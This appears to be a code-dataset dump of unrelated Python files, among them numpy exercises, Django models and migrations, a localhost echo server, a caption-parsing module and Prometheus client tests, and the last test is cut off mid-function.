text stringlengths 38 1.54M |
|---|
import numpy as np
def kwadraty(input_list):
output_list = [pow(liczba,2) for liczba in input_list if liczba>0]
return output_list
def wlasciwosci_macierzy(A):
liczba_elementow = A.size
liczba_kolumn = A.shape[1]
liczba_wierszy = A.shape[0]
srednie_wg_wierszy = A.mean(axis=1)
srednie_wg_kolumn = A.mean(axis=0)
trzecia_kolumna = A[:,2]
czwarty_wiersz = A[3]
return (
liczba_elementow, liczba_kolumn, liczba_wierszy,
srednie_wg_wierszy, srednie_wg_kolumn,
trzecia_kolumna, czwarty_wiersz)
def dzialanie1(A, x):
result=np.dot(A,x)
return result
def dzialanie2(A, B):
result=np.dot(A,B)
return result
def dzialanie3(A, B):
result=np.linalg.det(np.dot(A,B))
return result
def dzialanie4(A, B, x):
result=np.dot(A,B).T-np.dot(B.T,A.T)
return result
if __name__ == '__main__':
input_list=[1,2,3,4,5, -2, 8]
print(kwadraty(input_list))
M = np.arange(1, 51).reshape(5,10)
print(M)
A=np.array([[0,4,-2],[-4,-3,0]])
B=np.array([[0,1],[1,-1],[2,3]])
x=np.array([2,1,0])
print(wlasciwosci_macierzy(M))
print(dzialanie1(A,x))
print(dzialanie2(A,B))
print(dzialanie3(A,B))
print(dzialanie4(A,B,x))
A = np.array([[1, 1], [1, 2]])
print(A) #array A**-1 działa jak matematyczne podnoszenie liczb w tablicy do potęgi ujemnej a nie odwracanie macierzy
print(np.linalg.inv(A))
matrix=np.matrix(A)
print(matrix**-1)
print("////////////////////////////////////////////////////")
x=np.array([[1,2,3],[1,3,6]])
y=np.array([5,6])
result=np.dot(np.dot(np.linalg.inv(np.dot(x.T,x)),x.T),y)
print(result)
X=np.matrix(x)
Y=np.matrix(y).T
result=(X.T*X)**-1*X.T*Y
print(result) |
from django.db import models
# Create your models here.
class Comment(models.Model):
name = models.CharField(max_length=100)
email = models.EmailField(max_length=255)
url = models.URLField(blank=True)
text = models.TextField()
created_time = models.DateTimeField(auto_now_add=True)
post = models.ForeignKey('blog.Post', on_delete="DESC")
def __str__(self):
return self.text[:20]
def get_belong_post(self):
return self.post
class Essay_Comment(models.Model):
name = models.CharField(max_length=100)
email = models.EmailField(max_length=255)
url = models.URLField(blank=True)
text = models.TextField()
created_time = models.DateTimeField(auto_now_add=True)
essay = models.ForeignKey('blog.Essay', on_delete="DESC")
def __str__(self):
return self.text[:20]
def get_belong_essay(self):
return self.essay
class leave_messages():
name = models.CharField(max_length=100)
email = models.EmailField(max_length=255)
url = models.URLField(blank=True)
text = models.TextField()
created_time = models.DateTimeField(auto_now_add=True)
def __str__(self):
return self.text[:20] |
import socket
import thread
host = '127.0.0.1'
port = 5000
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print('Socket Ready...')
s.bind((host, port))
print('Bind Ready...')
print('Listening...')
s.listen(1)
def handle_client(client_socket):
while True:
data = client_socket.recv(1024)
if not data: break
print('Client says: ' + data)
print('Sending: ' + data)
client_socket.send(data)
client_socket.close()
while True:
client_socket, addr = s.accept()
print('Conexion from: '+str(addr))
thread.start_new_thread(handle_client ,(client_socket,))
s.close() |
# 4번은 문제 정확성은 다 맞추었는데 효율성 테스트에서 통과하지 못하였다.
# 효율성 테스트 1번까지만 어떻게 열심히해서 통과했는데 더 이상 통과할 수 없었다.
# python이라서 그런건가... c++로 해봐야하나라는 생각이 들기도 했고
# 아니면 아직 효율적으로 짜는 방법을 잘 모르는건가..라는 생각도 했다.
def solution(k, room_number):
answer = []
temp = [0 for i in range(k)]
length = len(room_number)
append = answer.append
index = temp.index
for i in range(length):
value = room_number[i]
if(temp[value-1] < 1):
append(value)
temp[value-1] = 1
else :
s = index(0, value)
append(s + 1)
temp[s] = 1
return answer
|
import collections
import unicodedata
from ..base import CaptionList, Caption, CaptionNode
from ..geometry import (
UnitEnum, Size, Layout, Point, Alignment,
VerticalAlignmentEnum, HorizontalAlignmentEnum
)
from .constants import (
PAC_BYTES_TO_POSITIONING_MAP, COMMANDS, PAC_TAB_OFFSET_COMMANDS,
MICROSECONDS_PER_CODEWORD,
)
PopOnCue = collections.namedtuple("PopOnCue", "buffer, start, end")
class PreCaption:
"""
The Caption class has been refactored and now its instances must be used as
immutable objects. Some of the code in this module, however, relied on the
fact that Caption instances were mutable. For backwards compatibility,
therefore, this class was created to work as a mutable caption data holder
used to eventually instantiate an actual Caption object.
"""
def __init__(self, start=0, end=0):
self.start = start
self.end = end
self.nodes = []
self.style = {}
self.layout_info = None
def to_real_caption(self):
return Caption(
self.start, self.end, self.nodes, self.style, self.layout_info
)
class TimingCorrectingCaptionList(list):
"""List of captions. When appending new elements, it will correct the end time
of the last ones, so they end when the new caption gets added.
"last ones" could mean the last caption `append`ed or all of the last
captions with which this list was `extended`
Also, doesn't allow Nones or empty captions
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._last_batch = ()
def append(self, p_object):
"""When appending a new caption to the list, make sure the last one
has an end. Also, don't add empty captions
:type p_object: Caption | None
"""
if p_object is None or not p_object.nodes:
return
self._update_last_batch(self._last_batch, p_object)
self._last_batch = (p_object,)
super().append(p_object)
def extend(self, iterable):
"""Adds the elements in the iterable to the list, regarding the first
caption's start time as the end time for the previously added
caption(s)
:param iterable: an iterable of Caption instances
"""
appendable_items = [item for item in iterable if item and item.nodes]
self._update_last_batch(self._last_batch, *appendable_items)
self._last_batch = tuple(appendable_items)
super().extend(appendable_items)
@staticmethod
def _update_last_batch(batch, *new_captions):
"""Given a batch of captions, sets their end time equal to the start
time of the first caption in *new_captions
The start time of the first caption in new_captions should never be 0.
This means an invalid SCC file.
:type batch: tuple[Caption]
:type new_captions: tuple[Caption]
"""
if not new_captions:
return
if not new_captions[0]:
return
if not new_captions[0].nodes:
return
new_caption = new_captions[0]
if batch and (batch[-1].end == 0
or new_caption.start - batch[-1].end
< 5 * MICROSECONDS_PER_CODEWORD + 1):
for caption in batch:
caption.end = new_caption.start
class NotifyingDict(dict):
"""Dictionary-like object, that treats one key as 'active',
and notifies observers if the active key changed
"""
# Need an unhashable object as initial value for the active key.
# That way we're sure this was never a key in the dict.
_guard = {}
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.active_key = self._guard
self.observers = []
def set_active(self, key):
"""Sets the active key
:param key: any hashable object
"""
if key not in self:
raise ValueError('No such key present')
# Notify observers of the change
if key != self.active_key:
for observer in self.observers:
observer(self.active_key, key)
self.active_key = key
def get_active(self):
"""Returns the value corresponding to the active key"""
if self.active_key is self._guard:
raise KeyError('No active key set')
return self[self.active_key]
def add_change_observer(self, observer):
"""Receives a callable function, which it will call if the active
element changes.
The observer will receive 2 positional arguments: the old and new key
:param observer: any callable that can be called with 2 positional
arguments
"""
if not callable(observer):
raise TypeError('The observer should be callable')
self.observers.append(observer)
class CaptionCreator:
"""Creates and maintains a collection of Captions"""
def __init__(self):
self._collection = TimingCorrectingCaptionList()
# subset of self._collection;
# captions here will be susceptible to time corrections
self._still_editing = []
def correct_last_timing(self, end_time, force=False):
"""Called to set the time on the last Caption(s) stored with no end
time
:type force: bool
:param force: Set the end time even if there's already an end time
:type end_time: float
:param end_time: microseconds; the end of the caption;
"""
if not self._still_editing:
return
if force:
# Select all last captions
captions_to_correct = self._still_editing
elif self._still_editing[-1].end == 0:
# Only select the last captions if they haven't gotten their
# end time set yet
captions_to_correct = self._still_editing
else:
return
for caption in captions_to_correct:
caption.end = end_time
def create_and_store(self, node_buffer, start, end=0):
"""Interpreter method, will convert the buffer into one or more Caption
objects, storing them internally.
This method relies on the InstructionNodeCreator's ability to generate
InstructionNodes properly, so at this point we can convert
_InstructionNodes nodes almost 1:1 to CaptionNodes
:type node_buffer: InstructionNodeCreator
:type start: float
:param start: the start time in microseconds
:type end: float
:param end: the end time in microseconds
"""
if node_buffer.is_empty():
return
caption = PreCaption()
caption.start = start
caption.end = end
self._still_editing = [caption]
for instruction in node_buffer:
# skip empty elements
if instruction.is_empty():
continue
elif instruction.requires_repositioning():
caption = PreCaption()
caption.start = start
caption.end = end
self._still_editing.append(caption)
# handle line breaks
elif instruction.is_explicit_break():
caption.nodes.append(CaptionNode.create_break(
layout_info=_get_layout_from_tuple(instruction.position)
))
# handle open italics
elif instruction.sets_italics_on():
caption.nodes.append(
CaptionNode.create_style(
True, {'italics': True},
layout_info=_get_layout_from_tuple(
instruction.position
))
)
# handle clone italics
elif instruction.sets_italics_off():
caption.nodes.append(
CaptionNode.create_style(
False, {'italics': True},
layout_info=_get_layout_from_tuple(
instruction.position)
))
# handle text
elif instruction.is_text_node():
layout_info = _get_layout_from_tuple(instruction.position)
caption.nodes.append(
CaptionNode.create_text(
instruction.get_text(), layout_info=layout_info),
)
caption.layout_info = layout_info
self._collection.extend(self._still_editing)
def get_all(self):
"""Returns the Caption collection as a CaptionList
:rtype: CaptionList
"""
caption_list = CaptionList()
for precap in self._collection:
caption_list.append(precap.to_real_caption())
return caption_list
class InstructionNodeCreator:
"""Creates _InstructionNode instances from characters and commands, storing
them internally
"""
def __init__(self, collection=None, position_tracker=None):
"""
:param collection: an optional collection of nodes
:param position_tracker:
:return:
"""
if not collection:
self._collection = []
else:
self._collection = collection
self._position_tracer = position_tracker
def is_empty(self):
"""Whether any text was added to the buffer"""
return not any(element.text for element in self._collection)
def add_chars(self, *chars):
"""Adds characters to a text node (last text node, or a new one)
:param chars: tuple containing text (Unicode string)
"""
if not chars:
return
current_position = self._position_tracer.get_current_position()
# get or create a usable node
if (self._collection and self._collection[-1].is_text_node()
and not self._position_tracer.is_repositioning_required()):
node = self._collection[-1]
else:
# create first node
node = _InstructionNode(position=current_position)
self._collection.append(node)
# handle a simple line break
if self._position_tracer.is_linebreak_required():
# must insert a line break here
self._collection.append(_InstructionNode.create_break(
position=current_position))
node = _InstructionNode.create_text(current_position)
self._collection.append(node)
self._position_tracer.acknowledge_linebreak_consumed()
# handle completely new positioning
elif self._position_tracer.is_repositioning_required():
self._collection.append(
_InstructionNode.create_repositioning_command(
current_position
)
)
node = _InstructionNode.create_text(current_position)
self._collection.append(node)
self._position_tracer.acknowledge_position_changed()
node.add_chars(*chars)
def interpret_command(self, command):
"""Given a command determines whether to turn italics on or off,
or to set the positioning
This is mostly used to convert from the legacy-style commands
:type command: str
"""
self._update_positioning(command)
text = COMMANDS.get(command, '')
if 'italic' in text:
if 'end' not in text:
self._collection.append(
_InstructionNode.create_italics_style(
self._position_tracer.get_current_position())
)
else:
self._collection.append(
_InstructionNode.create_italics_style(
self._position_tracer.get_current_position(),
turn_on=False
)
)
def _update_positioning(self, command):
"""Sets the positioning information to use for the next nodes
:type command: str
"""
if command in PAC_TAB_OFFSET_COMMANDS:
tab_offset = PAC_TAB_OFFSET_COMMANDS[command]
prev_positioning = self._position_tracer.default
positioning = (prev_positioning[0],
prev_positioning[1] + tab_offset)
else:
first, second = command[:2], command[2:]
try:
positioning = PAC_BYTES_TO_POSITIONING_MAP[first][second]
except KeyError:
return
self._position_tracer.update_positioning(positioning)
def __iter__(self):
return iter(_format_italics(self._collection))
@classmethod
def from_list(cls, stash_list, position_tracker):
"""Having received a list of instances of this class, creates a new
instance that contains all the nodes of the previous instances
(basically concatenates the many stashes into one)
:type stash_list: list[InstructionNodeCreator]
:param stash_list: a list of instances of this class
:type position_tracker: .state_machines.DefaultProvidingPositionTracker
:param position_tracker: state machine to be interrogated about the
positioning when creating a node
:rtype: InstructionNodeCreator
"""
instance = cls(position_tracker=position_tracker)
new_collection = instance._collection
for idx, stash in enumerate(stash_list):
new_collection.extend(stash._collection)
# use space to separate the stashes, but don't add final space
if idx < len(stash_list) - 1:
try:
instance._collection[-1].add_chars(' ')
except AttributeError:
pass
return instance
def remove_ascii_duplicate(self, accented_character):
"""
Characters from the Extended Characters list are usually preceded by
their ASCII substitute, in case the decoder is not able to display
the special character.
This is used to remove the substitute character in order to avoid
displaying both.
:type accented_character: str
"""
if self._collection and self._collection[-1].is_text_node() and \
self._collection[-1].text:
ascii_char = unicodedata.normalize('NFD', accented_character)\
.encode('ascii', 'ignore').decode("utf-8")
if ascii_char and self._collection[-1].text[-1] == ascii_char:
self._collection[-1].text = self._collection[-1].text[:-1]
def _get_layout_from_tuple(position_tuple):
"""Create a Layout object from the positioning information given
The row can have a value from 1 to 15 inclusive. (vertical positioning)
The column can have a value from 0 to 31 inclusive. (horizontal)
:param position_tuple: a tuple of ints (row, col)
:type position_tuple: tuple
:rtype: Layout
"""
if not position_tuple:
return None
row, column = position_tuple
# Horizontal safe area between 10% and 90%
horizontal = Size(80 * column / 32.0 + 10, UnitEnum.PERCENT)
# Vertical safe area between 5% and 95%
vertical = Size(90 * (row - 1) / 15.0 + 5, UnitEnum.PERCENT)
return Layout(origin=Point(horizontal, vertical),
alignment=Alignment(HorizontalAlignmentEnum.LEFT,
VerticalAlignmentEnum.TOP)
)
class _InstructionNode:
"""Value object, that can contain text information, or interpretable
commands (such as explicit line breaks or turning italics on/off).
These nodes will be aggregated into a RepresentableNode, which will then
be easily converted to a CaptionNode.
"""
TEXT = 0
BREAK = 1
ITALICS_ON = 2
ITALICS_OFF = 3
CHANGE_POSITION = 4
def __init__(self, text=None, position=None, type_=0):
"""
:type text: str
:param position: a tuple of ints (row, column)
:param type_: self.TEXT | self.BREAK | self.ITALICS
:type type_: int
"""
self.text = text
self.position = position
self._type = type_
def add_chars(self, *args):
"""This being a text node, add characters to it.
:param args:
:type args: tuple[str]
:return:
"""
if self.text is None:
self.text = ''
self.text += ''.join(args)
def is_text_node(self):
"""
:rtype: bool
"""
return self._type == self.TEXT
def is_empty(self):
"""
:rtype: bool
"""
if self._type == self.TEXT:
return not self.text
return False
def is_explicit_break(self):
"""
:rtype: bool
"""
return self._type == self.BREAK
def sets_italics_on(self):
"""
:rtype: bool
"""
return self._type == self.ITALICS_ON
def sets_italics_off(self):
"""
:rtype: bool
"""
return self._type == self.ITALICS_OFF
def is_italics_node(self):
"""
:rtype: bool
"""
return self._type in (self.ITALICS_OFF, self.ITALICS_ON)
def requires_repositioning(self):
"""Whether the node must be interpreted as a change in positioning
:rtype: bool
"""
return self._type == self.CHANGE_POSITION
def get_text(self):
"""A little legacy code."""
return ' '.join(self.text.split())
@classmethod
def create_break(cls, position):
"""Create a node, interpretable as an explicit line break
:type position: tuple[int]
:param position: a tuple (row, col) containing the positioning info
:rtype: _InstructionNode
"""
return cls(type_=cls.BREAK, position=position)
@classmethod
def create_text(cls, position, *chars):
"""Create a node interpretable as text
:type position: tuple[int]
:param position: a tuple (row, col) to mark the positioning
:type chars: tuple[str]
:param chars: characters to add to the text
:rtype: _InstructionNode
"""
return cls(''.join(chars), position=position)
@classmethod
def create_italics_style(cls, position, turn_on=True):
"""Create a node, interpretable as a command to switch italics on/off
:type position: tuple[int]
:param position: a tuple (row, col) to mark the positioning
:type turn_on: bool
:param turn_on: whether to turn the italics on or off
:rtype: _InstructionNode
"""
return cls(
position=position,
type_=cls.ITALICS_ON if turn_on else cls.ITALICS_OFF
)
@classmethod
def create_repositioning_command(cls, position=None):
"""Create node interpretable as a command to change the current
position
:type position:
"""
return cls(type_=cls.CHANGE_POSITION, position=position)
def __repr__(self): # pragma: no cover
if self._type == self.BREAK:
extra = 'BR'
elif self._type == self.TEXT:
extra = f'"{self.text}"'
elif self._type in (self.ITALICS_ON, self.ITALICS_OFF):
extra = 'italics {}'.format(
'on' if self._type == self.ITALICS_ON else 'off'
)
else:
extra = 'change position'
return f'<INode: {extra} >'
def _format_italics(collection):
"""Given a raw list of _InstructionNodes, returns a new equivalent list
where all the italics nodes properly close and open.
The list is equivalent in the sense that the SCC commands that would have
generated the output list, would have had the exact same visual effect
as the ones that generated the output, as far as italics are concerned.
This is useful because the raw commands read from the SCC can't be used
the way they are by the writers for the other formats. Those other writers
require the list of CaptionNodes to be formatted in a certain way.
Note: Using state machines to manage the italics didn't work well because
we're using state machines already to track the position, and their
interactions got crazy.
:type collection: list[_InstructionNode]
:rtype: list[_InstructionNode]
"""
new_collection = _skip_initial_italics_off_nodes(collection)
new_collection = _skip_empty_text_nodes(new_collection)
# after this step we're guaranteed a proper ordering of the nodes
new_collection = _skip_redundant_italics_nodes(new_collection)
# after this, we're guaranteed that the italics are properly contained
# within their context
new_collection = _close_italics_before_repositioning(new_collection)
# all nodes will be closed after this step
new_collection = _ensure_final_italics_node_closes(new_collection)
# removes pairs of italics nodes that don't do anything noticeable
new_collection = _remove_noop_italics(new_collection)
return new_collection
def _remove_noop_on_off_italics(collection):
"""Return an equivalent list to `collection`. It removes the italics node
pairs that don't surround text nodes, if those nodes are in the order:
on, off
:type collection: list[_InstructionNode]
:rtype: list[_InstructionNode]
"""
new_collection = []
to_commit = None
for node in collection:
if node.is_italics_node() and node.sets_italics_on():
to_commit = node
continue
elif node.is_italics_node() and node.sets_italics_off():
if to_commit:
to_commit = None
continue
else:
if to_commit:
new_collection.append(to_commit)
to_commit = None
new_collection.append(node)
return new_collection
def _remove_noon_off_on_italics(collection):
"""Removes pairs of off-on italics nodes, that don't surround any other
node
:type collection: list[_InstructionNode]
:return: list[_InstructionNode]
"""
new_collection = []
to_commit = None
for node in collection:
if node.is_italics_node() and node.sets_italics_off():
to_commit = node
continue
elif node.is_italics_node() and node.sets_italics_on():
if to_commit:
to_commit = None
continue
else:
if to_commit:
new_collection.append(to_commit)
to_commit = None
new_collection.append(node)
if to_commit:
new_collection.append(to_commit)
return new_collection
def _remove_noop_italics(collection):
"""Return an equivalent list to `collection`. It removes the italics node
pairs that don't surround text nodes
:type collection: list[_InstructionNode]
:rtype: list[_InstructionNode]
"""
new_collection = _remove_noop_on_off_italics(collection)
new_collection = _remove_noon_off_on_italics(new_collection)
return new_collection
def _skip_initial_italics_off_nodes(collection):
"""Return a collection like the one given, but without the
initial <Italics OFF> nodes
:type collection: list[_InstructionNode]
:rtype: list[_InstructionNode]
"""
new_collection = []
can_add_italics_off_nodes = False
for node in collection:
if node.is_italics_node():
if node.sets_italics_on():
can_add_italics_off_nodes = True
new_collection.append(node)
elif can_add_italics_off_nodes:
new_collection.append(node)
else:
new_collection.append(node)
return new_collection
def _skip_empty_text_nodes(collection):
"""Return an iterable containing all the nodes in the previous
collection except for the empty text nodes
:type collection: list[_InstructionNode]
:rtype: list[_InstructionNode]
"""
return [node for node in collection
if not (node.is_text_node() and node.is_empty())]
def _skip_redundant_italics_nodes(collection):
"""Return a list where the <Italics On> nodes only appear after
<Italics OFF>, and vice versa. This ignores the other node types, and
only removes redundant italic nodes
:type collection: list[_InstructionNode]
:rtype: list[_InstructionNode]
"""
new_collection = []
state = None
for node in collection:
if node.is_italics_node():
if state is None:
state = node.sets_italics_on()
new_collection.append(node)
continue
# skip the nodes that are like the previous
if node.sets_italics_on() is state:
continue
else:
state = node.sets_italics_on()
new_collection.append(node)
return new_collection
def _close_italics_before_repositioning(collection):
"""Make sure that for every opened italic node, there's a corresponding
closing node.
Will insert a closing italic node, before each repositioning node
:type collection: list[_InstructionNode]
:rtype: list[_InstructionNode]
"""
new_collection = []
italics_on = False
last_italics_on_node = None
for idx, node in enumerate(collection):
if node.is_italics_node() and node.sets_italics_on():
italics_on = True
last_italics_on_node = node
if node.is_italics_node() and node.sets_italics_off():
italics_on = False
if node.requires_repositioning() and italics_on:
# Append an italics closing node before the position change
new_collection.append(
_InstructionNode.create_italics_style(
# The position info of this new node should be the same
position=last_italics_on_node.position,
turn_on=False
)
)
new_collection.append(node)
# Append an italics opening node after the positioning change
new_collection.append(
_InstructionNode.create_italics_style(
position=node.position
)
)
continue
new_collection.append(node)
return new_collection
def _ensure_final_italics_node_closes(collection):
"""The final italics command needs to be closed
:type collection: list[_InstructionNode]
:rtype: list[_InstructionNode]
"""
new_collection = list(collection)
italics_on = False
last_italics_on_node = None
for node in collection:
if node.is_italics_node() and node.sets_italics_on():
italics_on = True
last_italics_on_node = node
if node.is_italics_node() and node.sets_italics_off():
italics_on = False
if italics_on:
new_collection.append(
_InstructionNode.create_italics_style(
position=last_italics_on_node.position,
turn_on=False
)
)
return new_collection
|
'''
Find all combinations for a,b,c,d between 1 <= a,b,c,d <= 1000,
that satisfy a^3 + b^3 = c^3 + d^3
'''
class Prob:
@staticmethod
def eval(lo, hi):
abMap = {} # maps: a^3 + b^3 : [a,b]
for a in range(lo, hi+1):
for b in range(lo, hi+1):
leftSide = a**3 + b**3
if leftSide not in abMap.keys():
abMap[leftSide] = [[a,b]]
else:
abMap[leftSide].append([a,b])
out = []
for c in range(lo, hi+1):
for d in range(lo, hi+1):
rightSide = c**3 + d**3
if rightSide in abMap.keys():
for pair in abMap[rightSide]:
out.append(pair + [c,d])
print("abMap:")
print(abMap)
print("out: ", out)
@staticmethod
def test1(alg):
lo = 1
hi = 2
Prob.eval(lo, hi)
alg = Prob.eval
Prob.test1(alg)
|
from django.urls import path
from .views import index, posts
urlpatterns = [
path('', index, name="index"),
path('home/', index, name="index"),
path('<int:post>', posts, name="posts"),
]
|
import logging
from trainer_v2.per_project.tli.bioclaim_qa.eval_helper import solve_bioclaim, batch_solve_bioclaim
from trainer_v2.per_project.tli.qa_scorer.nli_direct import NLIAsRelevance, get_entail_cont, get_entail, \
NLIAsRelevanceRev
from trainer_v2.per_project.tli.bioclaim_qa.path_helper import get_retrieval_save_path
from trainer_v2.chair_logging import c_log
from trainer_v2.keras_server.name_short_cuts import get_nli14_cache_client
from trec.trec_parse import write_trec_ranked_list_entry
def do_inner(run_name, split, score_getter):
c_log.info(f"nli_drect({run_name}, {split})")
nli_predict_fn = get_nli14_cache_client()
module = NLIAsRelevanceRev(nli_predict_fn, score_getter)
rl_flat = batch_solve_bioclaim(module.batch_predict, split, run_name)
save_name = f"{run_name}_{split}"
write_trec_ranked_list_entry(rl_flat, get_retrieval_save_path(save_name))
def main():
c_log.setLevel(logging.DEBUG)
run_name = "nli_direct_rev"
score_getter = get_entail
do_inner(run_name, "dev", score_getter)
do_inner(run_name, "test", score_getter)
if __name__ == "__main__":
main()
|
import shelve, sys
language = sys.argv[1]
INDEX_FILE = "/Users/marc/Desktop/FUSE/ontology_creation/data/patents/%s/idx/index" % language
INDEX = shelve.open(INDEX_FILE)
print "Searching index with %d keys" % len(INDEX.keys())
while True:
print "Enter a key:"
term = raw_input()
if not term:
break
if INDEX.has_key(term):
for y in sorted(INDEX[term].keys()):
print " %s %3d" % (y, INDEX[term][y])
else:
print " Not in index"
|
# Generated by Django 2.0.4 on 2018-04-29 09:51
import datetime
from django.db import migrations, models
import magnum_online.functions
class Migration(migrations.Migration):
dependencies = [
('products', '0002_auto_20180429_1507'),
]
operations = [
migrations.AddField(
model_name='transaction',
name='status',
field=models.CharField(choices=[('I', 'Incomplete'), ('R', 'Rejected'), ('C', 'Canceled'), ('S', 'Completed')], default='I', max_length=3),
),
migrations.AlterField(
model_name='transaction',
name='created',
field=models.DateTimeField(default=datetime.datetime.now),
),
migrations.AlterField(
model_name='transaction',
name='qr_hash',
field=models.CharField(default=magnum_online.functions.randhash6, max_length=6, unique=True),
),
]
|
# -*- coding:utf-8 -*-
default_app_config = "operation.apps.OperationConfig" # 配置默认的operation |
from __future__ import unicode_literals
import sys
import time
from prometheus_client import (
CollectorRegistry, Counter, Enum, Gauge, Histogram, Info, Metric, Summary,
)
from prometheus_client.core import (
Exemplar, GaugeHistogramMetricFamily, Timestamp,
)
from prometheus_client.openmetrics.exposition import generate_latest
if sys.version_info < (2, 7):
# We need the skip decorators from unittest2 on Python 2.6.
import unittest2 as unittest
else:
import unittest
class TestGenerateText(unittest.TestCase):
def setUp(self):
self.registry = CollectorRegistry()
# Mock time so _created values are fixed.
self.old_time = time.time
time.time = lambda: 123.456
def tearDown(self):
time.time = self.old_time
def custom_collector(self, metric_family):
class CustomCollector(object):
def collect(self):
return [metric_family]
self.registry.register(CustomCollector())
def test_counter(self):
c = Counter('cc', 'A counter', registry=self.registry)
c.inc()
self.assertEqual(b'# HELP cc A counter\n# TYPE cc counter\ncc_total 1.0\ncc_created 123.456\n# EOF\n',
generate_latest(self.registry))
def test_counter_total(self):
c = Counter('cc_total', 'A counter', registry=self.registry)
c.inc()
self.assertEqual(b'# HELP cc A counter\n# TYPE cc counter\ncc_total 1.0\ncc_created 123.456\n# EOF\n',
generate_latest(self.registry))
def test_gauge(self):
g = Gauge('gg', 'A gauge', registry=self.registry, multiprocess_mode='all')
g.set(17)
self.assertEqual(b'# HELP gg A gauge\n# TYPE gg gauge\ngg 17.0\n# EOF\n', generate_latest(self.registry))
def test_summary(self):
s = Summary('ss', 'A summary', ['a', 'b'], registry=self.registry)
s.labels('c', 'd').observe(17)
self.assertEqual(b"""# HELP ss A summary
# TYPE ss summary
ss_count{a="c",b="d"} 1.0
ss_sum{a="c",b="d"} 17.0
ss_created{a="c",b="d"} 123.456
# EOF
""", generate_latest(self.registry))
@unittest.skipIf(sys.version_info < (2, 7), "Test requires Python 2.7+.")
def test_histogram(self):
s = Histogram('hh', 'A histogram', registry=self.registry)
s.observe(0.05)
self.assertEqual(b"""# HELP hh A histogram
# TYPE hh histogram
hh_bucket{le="0.005"} 0.0
hh_bucket{le="0.01"} 0.0
hh_bucket{le="0.025"} 0.0
hh_bucket{le="0.05"} 1.0
hh_bucket{le="0.075"} 1.0
hh_bucket{le="0.1"} 1.0
hh_bucket{le="0.25"} 1.0
hh_bucket{le="0.5"} 1.0
hh_bucket{le="0.75"} 1.0
hh_bucket{le="1.0"} 1.0
hh_bucket{le="2.5"} 1.0
hh_bucket{le="5.0"} 1.0
hh_bucket{le="7.5"} 1.0
hh_bucket{le="10.0"} 1.0
hh_bucket{le="+Inf"} 1.0
hh_count 1.0
hh_sum 0.05
hh_created 123.456
# EOF
""", generate_latest(self.registry))
def test_histogram_exemplar(self):
class MyCollector(object):
def collect(self):
metric = Metric("hh", "help", 'histogram')
# This is not sane, but it covers all the cases.
metric.add_sample("hh_bucket", {"le": "1"}, 0, None, Exemplar({'a': 'b'}, 0.5))
metric.add_sample("hh_bucket", {"le": "2"}, 0, None, Exemplar({'le': '7'}, 0.5, 12))
metric.add_sample("hh_bucket", {"le": "3"}, 0, 123, Exemplar({'a': 'b'}, 2.5, 12))
metric.add_sample("hh_bucket", {"le": "4"}, 0, None, Exemplar({'a': '\n"\\'}, 3.5))
metric.add_sample("hh_bucket", {"le": "+Inf"}, 0, None, None)
yield metric
self.registry.register(MyCollector())
self.assertEqual(b"""# HELP hh help
# TYPE hh histogram
hh_bucket{le="1"} 0.0 # {a="b"} 0.5
hh_bucket{le="2"} 0.0 # {le="7"} 0.5 12
hh_bucket{le="3"} 0.0 123 # {a="b"} 2.5 12
hh_bucket{le="4"} 0.0 # {a="\\n\\"\\\\"} 3.5
hh_bucket{le="+Inf"} 0.0
# EOF
""", generate_latest(self.registry))
def test_nonhistogram_exemplar(self):
class MyCollector(object):
def collect(self):
metric = Metric("hh", "help", 'untyped')
# This is not sane, but it covers all the cases.
metric.add_sample("hh_bucket", {}, 0, None, Exemplar({'a': 'b'}, 0.5))
yield metric
self.registry.register(MyCollector())
with self.assertRaises(ValueError):
generate_latest(self.registry)
def test_nonhistogram_bucket_exemplar(self):
class MyCollector(object):
def collect(self):
metric = Metric("hh", "help", 'histogram')
# This is not sane, but it covers all the cases.
metric.add_sample("hh_count", {}, 0, None, Exemplar({'a': 'b'}, 0.5))
yield metric
self.registry.register(MyCollector())
with self.assertRaises(ValueError):
generate_latest(self.registry)
def test_gaugehistogram(self):
self.custom_collector(
GaugeHistogramMetricFamily('gh', 'help', buckets=[('1.0', 4), ('+Inf', (5))], gsum_value=7))
self.assertEqual(b"""# HELP gh help
# TYPE gh gaugehistogram
gh_bucket{le="1.0"} 4.0
gh_bucket{le="+Inf"} 5.0
gh_gcount 5.0
gh_gsum 7.0
# EOF
""", generate_latest(self.registry))
def test_info(self):
i = Info('ii', 'A info', ['a', 'b'], registry=self.registry)
i.labels('c', 'd').info({'foo': 'bar'})
self.assertEqual(b"""# HELP ii A info
# TYPE ii info
ii_info{a="c",b="d",foo="bar"} 1.0
# EOF
""", generate_latest(self.registry))
def test_enum(self):
i = Enum('ee', 'An enum', ['a', 'b'], registry=self.registry, states=['foo', 'bar'])
i.labels('c', 'd').state('bar')
self.assertEqual(b"""# HELP ee An enum
# TYPE ee stateset
ee{a="c",b="d",ee="foo"} 0.0
ee{a="c",b="d",ee="bar"} 1.0
# EOF
""", generate_latest(self.registry))
def test_unicode(self):
c = Counter('cc', '\u4500', ['l'], registry=self.registry)
c.labels('\u4500').inc()
self.assertEqual(b"""# HELP cc \xe4\x94\x80
# TYPE cc counter
cc_total{l="\xe4\x94\x80"} 1.0
cc_created{l="\xe4\x94\x80"} 123.456
# EOF
""", generate_latest(self.registry))
def test_escaping(self):
c = Counter('cc', 'A\ncount\\er\"', ['a'], registry=self.registry)
c.labels('\\x\n"').inc(1)
self.assertEqual(b"""# HELP cc A\\ncount\\\\er\\"
# TYPE cc counter
cc_total{a="\\\\x\\n\\""} 1.0
cc_created{a="\\\\x\\n\\""} 123.456
# EOF
""", generate_latest(self.registry))
def test_nonnumber(self):
class MyNumber(object):
def __repr__(self):
return "MyNumber(123)"
def __float__(self):
return 123.0
class MyCollector(object):
def collect(self):
metric = Metric("nonnumber", "Non number", 'untyped')
metric.add_sample("nonnumber", {}, MyNumber())
yield metric
self.registry.register(MyCollector())
self.assertEqual(b'# HELP nonnumber Non number\n# TYPE nonnumber unknown\nnonnumber 123.0\n# EOF\n',
generate_latest(self.registry))
def test_timestamp(self):
class MyCollector(object):
def collect(self):
metric = Metric("ts", "help", 'unknown')
metric.add_sample("ts", {"foo": "a"}, 0, 123.456)
metric.add_sample("ts", {"foo": "b"}, 0, -123.456)
metric.add_sample("ts", {"foo": "c"}, 0, 123)
